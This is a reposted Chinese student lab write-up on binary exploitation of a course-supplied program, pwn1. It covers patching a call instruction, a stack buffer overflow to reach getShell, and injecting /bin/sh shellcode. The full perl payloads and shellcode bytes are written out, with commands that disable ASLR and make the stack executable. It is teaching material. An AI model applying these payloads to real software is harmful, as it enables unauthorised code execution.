2018-2019-2 网络对抗技术 20165332 Exp1 PC平台逆向破解

最新推荐文章于 2024-07-28 23:42:25 发布
最新推荐文章于 2024-07-28 23:42:25 发布
阅读量92 收藏
点赞数
文章标签: shell 运维 操作系统
原文链接:http://www.cnblogs.com/yyzzuishuai/p/10543035.html
版权

2018-2019-2 网络对抗技术 20165332 Exp1 PC平台逆向破解

NOP, JNE, JE, JMP, CMP汇编指令的机器码
NOP汇编指令:执行到NOP指令时,CPU仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。
JNE汇编指令:条件转移指令,如果不相等则跳转。
JE汇编指令:如果条件相等则跳转。
JMP汇编指令:直接跳转到所需跳转的位置。
CMP汇编指令:减法指令,只是对操作数之间运算比较,不保存结果。cmp指令执行后,将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。

任务一、直接修改程序机器指令,改变程序执行流程

1、首先将pwn1文件通过共享文件夹传入虚拟机当中,通过chmod +x pwn1指令加权限,然后objdump -d pwn1,反汇编pwn1文件。
1301336-20190316165158214-1446742205.png
1301336-20190316165201087-1736591285.png
2、反汇编结束后发现:main函数里面有一步call 8048491,机器码指令为e8 d7 ff ff ff(call的机器码就是e8,后面是地址)。
通过进一步的分析:08048491是0804847d是我们的跳转目标。

  • vi pwn1进入命令模式
  • 输入:%!xxd将显示模式切换为十六进制
  • 在底行模式输入/e8 d7定位需要修改的地方,并确认
  • 进入插入模式,修改d7为c3
  • 输入:%!xxd -r将十六进制转换为原格式
  • 使用:wq保存并退出
    1301336-20190316165425569-879609526.png
    通过上述步骤看见我的main函数里面已经修改为e8 c3 ff ff ff

4、执行./pwn1文件可以成功获取shell:
1301336-20190316165449339-395566852.png
完成第一个实验。

二、通过构造输入参数,造成BOF攻击,改变程序执行流

1、

使用gdb命令,file pwn1载入pwn1文件,输入gdb pwn1。

输入r执行pwn1,这时程序正常执行,在foo子函数调用的过程中,需要我们输入一个字符串。

输入36个字符后回车:abcdefghijklmnopqrstuvwxyz1234567890

1301336-20190316165525494-1790281384.png
1301336-20190316165559242-1450471337.png

2、

此时eip寄存器中的值为0x30393837,eip寄存器的值是保存程序下一步所要执行指令的地址,本次实验用的是小端机器,30、39、38、37分别是0、9、8、7对应的ASCII码,那么也就是说最后4位刚好完成溢出,覆盖掉返回地址了。

我们需要使用perl语句,用管道的方式把上一个命令的结果作为下一个的输入。

使用:perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input

然后将input的输入,通过管道符“|”,作为pwn1的输入。攻击成功以后出现的截图:

1301336-20190316165620344-1241567095.png
完成第二个实验。

三、注入Shellcode并执行

shellcode就是一段机器指令(code)
通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),所以这段机器指令被称为shellcode。
在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。
首先使用apt-get install execstack命令安装execstack。
1301336-20190316165639901-1436624323.png

修改以下内容:

  • 设置堆栈可执行execstack -s pwn1
  • 查询文件的堆栈是否可执行 execstack -q pwn1
  • 关闭地址随机化echo "0" > /proc/sys/kernel/randomize_va_space
  • 查询地址随机化是否关闭(0代表关闭,2代表开启)more /proc/sys/kernel/randomize_va_space
    1301336-20190316165759178-1921030324.png

用perl语言输入代码
perl -e 'print "A" x 32;print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
上面的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。我们把它改为这段shellcode的地址。

确定返回地址的值

将写好的代码通过管道方式输入给程序pwn1中的foo函数进行覆盖
(cat input_shellcode;cat) | ./pwn1
打开另外一个终端,用gdb来调试pwn1这个进程
ps -ef | grep pwn1确定pwn1的进程号
启动gdb调试这个程序 gdb attach 1964
1301336-20190316165844197-1478052565.png

1301336-20190316165854010-496351290.png

  • 设置断点来查看注入buf的内存地址disassemble foo
  • ret的地址为 0x080484ae,ret完就会跳到我们覆盖的返回地址了
  • break *0x080484ae设置断点
  • 在另一个终端按下回车,这样程序就会执行之后在断点处停下来
  • 再在gdb调试的终端输入 c 继续运行程序
  • 通过info r esp查看esp寄存器的地址
    1301336-20190316165924465-44870860.png
    可以看到0x01020304所在的地址为0xffffd22c,那么注入的shellcode代码的地址应该在该地址后四个字节的位置,即

0xffffd22c + 0x00000004 = 0xffffd230

退出gdp调试。
输入

perl -e 'print "A" x 32;print "\x30\xd2\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode

执行程序,攻击成功
1301336-20190316170016696-121809398.png

转载于:https://www.cnblogs.com/yyzzuishuai/p/10543035.html

weixin_30822451
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2018-3191利用exp
01-08
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
weblogic CVE-2018-2628--exp
01-20
weblogic CVE-2018-2628--exp
2018-2019-2 《网络对抗技术Exp1 PC平台逆向破解 20165326
weixin_30690833的博客
03-13 90
实验一 目录 直接修改程序机器指令,改变程序执行流程 通过构造输入参数,造成BOF攻击,改变程序执行流 注入Shellcode并执行 问题及解决 思想感悟 一、修改机器指令 首先你需要一个pwn1文件,使用cp命令复制到当前目录下 反汇编,objdump -d pwn1 查看main函数,当前call调用的是foo函数,我们通过修改调用函数的地址使其指向getShell 使用vi pwn1编辑...
2018-2019-2 网络对抗技术 20162329 Exp1 PC平台逆向破解
weixin_34304013的博客
03-14 107
目录 1.实践目标 2.实验内容 2.1 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。 2.2 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。 2.3 注入一个自己制作的shellcode并运行这段shellc...
2018-2019 2 20165203 《网络对抗技术Exp1 PC平台逆向破解
weixin_30609331的博客
03-15 112
2018-2019 2 20165203 《网络对抗技术Exp1 PC平台逆向破解 实验要求 1.掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码 2.掌握反汇编与十六进制编程器 3.能正确修改机器指令改变程序执行流程 4.能正确构造payload进行bof攻击 实验内容 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数 利用foo函数的Bof漏...
2018-2019-2 网络对抗技术 20165217 Exp1 PC平台逆向破解
diaominduo4849的博客
03-16 117
本次实验分为三个模块: (一)直接修改程序机器指令,改变程序执行流程; (二)通过构造输入参数,造成BOF攻击,改变程序执行流; (三)注入Shellcode并执行; 实验准备阶段: 1.将老师提供的pwn1文件通过共享文件夹传到kali上以便以后使用。 2.将pwn1文件复制到主目录下,并进行备份。 有关知识内容 1.掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码 N...
cve-2019-0708-poc-exp.zip
05-20
"CVE-20190708-exp"和"CVE-2019-07-08-p"以及"CVE20190708-exp-"是与该漏洞相关的标签,用于标记和追踪与这个安全事件有关的讨论、文章和资源。这些标签帮助研究人员和安全专业人员快速定位与这个特定漏洞相关的消息...
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT...
CVE-2018-8120 Microsoft Windows提权漏洞 Exp_64
06-10
CVE-2018-8120 Microsoft Windows提权漏洞 Exp_32 该资源适用于64位windows操作系统
【busybox记录】【shell指令】echo
44083579的博客
07-27 224
echo指令用法
docker部署mysql8.x版本,编写shell脚本自动部署安装mysql
qq_43700885的博客
07-23 642
*1.**先自行安装好docker环境,docker的镜像注册中心最好是国内的,例如执行一下命令直接修改docker配置,这里基本就按照成功了,直接输入docker查看日志命令查看容器启动情况。将下面的命令直接粘贴到文件install-mysql.sh。加载刚修改的配置文件并重新启动docker。**2.**创建mysql自动部署脚本文件。接下来直接执行脚本输入一下命令。出现下图红框标识就表示安装成功。
shell脚本与sed基本语法
最新发布
m0_74614835的博客
07-28 247
shell
linux系统巡检及shell脚本
qq_63926306的博客
07-27 884
egrep是grep的扩展,支持更多的re元字符, fgrep就是fixed grep或fast grep,它们把所有的字母都看作单词,也就是说,正则表达式中的元字符表示回其自身的字面意义,不再特殊。grep可用于shell脚本,因为grep通过返回一个状态值来说明搜索的状态,如果模板搜索成功,则返回0,如果搜索不成功,则返回1,如果搜索的文件不存在,则返回2。awk 是一种很棒的语言,它适合文本处理和报表生成,其语法较为常见,借鉴了某些语言的一些精华,如 C 语言等。s :取代,可以直接进行取代的工作!
Rust:在Ubuntu22.04上安装
风静如云的博客
07-27 373
尝试后由于网络原因,无法顺利安装。然后编辑rust.sh文件。设置rust.sh为可执行。2.使用国内源进行安装。直接回车选择默认即可。
Aria2 任意文件写入漏洞
山兔的博客
07-28 572
Aria2是一个在命令行下运行,多协议,多来源下载工具(HTTP / HTTPS,FTP,BitTorrent,Metalink),内建XML-RPC用户界面。Aria提供RPC服务器,通过–enable-rpc参数启动。Aria2的RPC服务器可以方便的添加、删除下载项目我们可以使用 RPC 接口来操作 aria2 并将文件下载到任意目录,从而造成任意文件写入漏洞。6800 是 Aria2 的 RPC 服务的默认端口。环境启动后,访问 和 服务会返回 404 页面。
【shell】shell循环的几种方式
卷王工作室
07-28 139
shell循环的几种方式
VulnHub:funbox10
Aukum的博客
07-28 725
VulnHub_——FUNBOX: UNDER CONSTRUCTION! 靶机,涉及osCommerce远程代码执行漏洞利用,pspy64提权。
解决Centos不支持docker命令行tab提示问题!!!
lilinhai548的专栏
07-28 81
在使用CentOS操作系统时,有些用户可能会遇到不能自动补全Docker命令的问题。这是因为CentOS默认不支持Docker Tab提示功能,需要手动配置才能实现。在这篇科普文章中,我们将介绍如何解决这个问题,并提供相应的代码示例。
MSP-EXP430G2 LaunchPad使用手册:从安装到设计
1. **概述**:MSP-EXP430G2 LaunchPad提供了一个便捷的环境,用于学习、测试和开发MSP430G2微控制器的应用。它包含了所有必要的硬件,如编程接口、调试工具以及一些示例应用。 2. **安装**:用户需要下载并安装相关...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值